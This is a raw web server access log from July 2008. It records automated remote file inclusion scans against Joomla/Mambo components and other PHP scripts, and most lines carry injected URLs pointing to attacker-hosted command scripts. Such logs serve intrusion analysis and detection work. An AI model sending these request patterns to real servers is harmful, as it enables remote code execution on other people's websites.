207.213.245.1 - - [19/Jul/2008:10:04:55 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:56 -0700] "GET /logs/access_080329.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:04:56 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:56 -0700] "GET //components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:04:56 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:10:04:57 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:10:04:57 -0700] "GET //components/com_extcalendar/admin_events.php?http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:57 -0700] "GET /logs//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:04:58 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:04:59 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:02 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:05:04 -0700] "GET /logs/access_080218.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:05:06 -0700] "GET /bikes/CreSTOC07/CreSTOC2007057.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:05:09 -0700] "GET /logs/access_080218.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:11 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:15 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:16 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:23 -0700] "GET /logs/access_080329.log//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:23 -0700] "GET //components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:24 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:34 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:05:36 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:05:38 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18515 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:05:39 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:10:05:39 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:10:05:39 -0700] "GET //components/com_htmlarea3_xtd-c/popups/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:39 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:40 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:40 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:05:41 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:05:42 -0700] "GET //components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:05:43 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:05:43 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:05:43 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:43 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:44 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:44 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:47 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:47 -0700] "GET /logs/access_080329.log//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:48 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:48 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18437 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:05:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:05:52 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:05:52 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:05:56 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:05:56 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:05:56 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:00 -0700] "GET /logs/access.log//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:06:03 -0700] "GET /bikes/CreSTOC07/CreSTOC2007059.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:05 -0700] "GET //components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:06 -0700] "GET /logs//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:06:21 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:06:22 -0700] "GET //components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:06:22 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:06:24 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 200 18501 "-" "libwww-perl/5.75" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:06:24 -0700] "GET /logs/access_080129.log//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:06:34 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:37 -0700] "GET /logs/access.log//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:06:41 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:42 -0700] "GET //components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:06:42 -0700] "GET /logs//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:06:50 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:06:57 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:06:58 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:06:58 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:07:00 -0700] "GET /logs/access_080129.log//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:07:01 -0700] "GET /bikes/CreSTOC07/CreSTOC2007061.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:07:08 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:07:08 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:07:09 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:07:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18437 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:07:17 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:07:19 -0700] "GET /logs/access_080218.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:07:22 -0700] "GET /logs/access_080218.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:07:27 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:10:07:28 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:30 -0700] "GET /logs/access_080329.log//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:31 -0700] "GET //components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:10:07:31 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:32 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:07:38 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:49 -0700] "GET /logs/access_080329.log//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:49 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:07:50 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.108.171 - - [19/Jul/2008:10:07:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0122.jpg HTTP/1.1" 200 508109 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:07:56 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:08:00 -0700] "GET /bikes/CreSTOC07/CreSTOC2007062.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:08:11 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:08:12 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:08:12 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:08:12 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:17 -0700] "GET /logs/access_080329.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:21 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:25 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:40 -0700] "GET /logs/access_080329.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:41 -0700] "GET //components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:41 -0700] "GET /logs//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:54 -0700] "GET /logs/access_080329.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:56 -0700] "GET /logs/access_080329.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:57 -0700] "GET //components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:57 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:58 -0700] "GET /logs//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:08:58 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:09:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:09:01 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:09:03 -0700] "GET /bikes/CreSTOC07/CreSTOC2007063.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:09:20 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:09:20 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:09:21 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.238.16 - - [19/Jul/2008:10:09:21 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/rubivisii/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:09:25 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:09:25 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
